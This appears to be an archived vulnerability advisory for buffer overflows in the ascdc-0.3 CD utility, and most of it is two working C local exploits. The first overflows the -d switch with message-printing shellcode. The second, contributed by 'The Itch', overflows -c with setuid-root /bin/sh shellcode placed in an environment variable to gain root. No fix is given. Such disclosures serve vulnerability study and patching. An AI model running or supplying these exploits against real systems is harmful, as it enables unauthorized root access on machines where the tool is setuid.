|
Vulnerability ascdc Affected ascdc-0.3 Description Following is based on a WSIR-01/02-06 discovered by Christer Uberg (Wkit Security). Use this bad boy to swap CD's graphically under X. There are multiple buffer overflows in ascdc that can be exploited to gain root if it is installed setuid root. It is NOT installed setuid root by default but as the README says "If you intend to use the automounting feature, you must either run ascdc as root, or setuid it". Christer used the -d option in the exploit but overflows also exist in the -m & -c switches. Exploit: char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0" "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80\xe8\xe6\xff\xff\xff" "Would you like to play a game? y\x0aStrange, the only winning move is not to play.\x0a"; #define bsize 600 unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int i; buff = malloc(bsize); addr = get_sp(); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < 600/2; i++) buff[i] = 0x90; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0); } 'The Itch' sent working version of the exploit for ascdc-0.3 using the -c switch this time: /* /usr/X11R6/bin/ascdc local exploit. * (version: ascdc-0.3-2-i386) * * Vulnerability found by Christer Öberg, Wkit Security AB * * - The Itch / BsE * - http://bse.die.ms * - irc.axenet.org */ #include <stdio.h> #include <stdlib.h> #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 /* adjust if needed, this should be suffient */ #define DEFAULT_BUFFER_SIZE 600 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *buff; char *egg; char *ptr; long *addr_ptr; long addr; int bsize = DEFAULT_BUFFER_SIZE; int eggsize = DEFAULT_EGG_SIZE; int i; if(argc > 1) { bsize = atoi(argv[1]); } if(!(buff = malloc(bsize))) { printf("unable to allocate memory for %d bytes\n", bsize); exit(1); } if(!(egg = malloc(eggsize))) { printf("unable to allocate memory for %d bytes\n", eggsize); exit(1); } addr = get_sp(); printf("/usr/X11R6/bin/ascdc local exploit.\n"); printf("Coded by The Itch / BsE\n\n"); printf("Using return address: 0x%x\n", addr); printf("Using buffersize : %d\n", bsize); ptr = buff; addr_ptr = (long *) ptr; for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; } ptr = egg; for(i = 0; i < eggsize - strlen(shellcode) -1; i++) { *(ptr++) = NOP; } for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); memcpy(buff, "RET=", 4); putenv(buff); system("/usr/X11R6/bin/ascdc -c $RET"); return 0; } Solution No information available.